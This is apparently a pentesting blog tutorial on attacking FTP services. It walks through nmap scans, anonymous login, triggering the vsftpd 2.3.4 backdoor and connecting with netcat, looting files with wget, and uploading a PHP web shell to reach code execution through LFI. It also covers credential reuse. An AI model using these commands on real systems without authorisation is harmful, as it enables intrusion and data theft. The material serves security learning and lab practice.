Leave a Comment / Exploit-Services, Uncategorized / By

Breaking into FTP: A Pentester’s Guide to Enumeration and Exploitation

FTP (File Transfer Protocol) is one of those legacy services that still shows up in networks more often than you’d think. And when it does, it often comes with bad configurations and juicy missteps. This post walks you through exploiting FTP from discovery to post-exploitation, with all the tools and commands you’ll want in your arsenal.

1. What is FTP and Why It Matters

FTP (File Transfer Protocol) is a standard protocol used to transfer files between systems over a TCP/IP network. It runs on:

  • Port 21: Command/control (plaintext credentials unless secured with SSL/TLS)
  • Port 20: Data transfer (less common in passive mode)

⚠ Common Issues:

  • Anonymous login enabled
  • Writable directories
  • Credentials exposed in plain text
  • Legacy servers (e.g., vsftpd 2.3.4 backdoor)
  • Weak or default credentials

2. Scanning for FTP

Nmap

nmap -p21 -sV --script=ftp-anon,ftp-bounce,ftp-syst,ftp-vsftpd-backdoor <target>

This command checks for:

  • Anonymous access
  • FTP bounce vulnerability
  • Backdoored vsftpd versions
  • FTP banner & system info

RustScan

rustscan -a <target> -- -sV -sC -p 21

Quickly identifies FTP alongside other open ports.

3. FTP Enumeration

Once you’ve confirmed FTP is open, it’s time to dig deeper.

ftp (interactive CLI)

ftp <target>
  • Test anonymous login: Name: anonymous Password: anonymous@domain.com
  • Use ls, get, put to interact with the file system.

smbclient-style access via wget or curl

If directory listing is enabled:

wget ftp://anonymous:anonymous@<target>/

Or:

curl ftp://anonymous:anonymous@<target>/

Nmap Scripts

nmap --script=ftp-* -p21 <target>

Use this to gather version info, check for write access, test for vulnerabilities, etc.

Metasploit Enumeration

use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous

These are handy for automating checks across multiple hosts.

4. FTP Exploitation Techniques

Here’s where we take advantage of poor FTP setups.

Anonymous Login

If the server allows anonymous access, treat it like a public file share:

  • Look for downloadable config files, database dumps, backups, etc.
  • Check for upload/write access (try put payload.exe).

vsftpd 2.3.4 Backdoor

This infamous version opens a shell on port 6200 if you use :) in the username.

ftp <target>
Name: user:)

Then connect to:

nc <target> 6200

FTP Write + LFI (Local File Inclusion)

If the server allows uploads and the web server includes files based on user input, you may be able to plant a malicious PHP file via FTP and trigger RCE through LFI.

Credential Reuse

If you capture FTP creds, try reusing them on:

  • SMB shares
  • SSH logins
  • Web logins

FTP Bounce Attack

Rare but still worth checking:

nmap -p 21 --script=ftp-bounce <target>

If vulnerable, you can scan internal network hosts via the FTP server.

5. Post-Exploitation

If you’ve got access, here’s what to do next.

Loot the Server

Download files:

ftp <target>
get sensitive.txt

Or:

wget ftp://user:pass@<target>/backup.zip

Upload Web Shells or Payloads

If upload is allowed:

put shell.php

Follow that up by accessing it in a browser if served via HTTP:

http://<target>/uploads/shell.php

Trigger Execution

  • Combine with LFI or misconfigured web server to trigger uploaded payloads.
  • Use a reverse shell if you can execute files via another exposed service.

TryHackMe Rooms for FTP Practice

Wrap-Up

FTP might be old, but it’s still full of holes. Whether it’s anonymous login, write permissions, or vulnerable software, FTP often gives pentesters an easy win if you’re thorough with enumeration and creative with exploitation.

It’s also an entry point that leads to bigger things—like planting web shells or collecting credentials to reuse elsewhere.

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top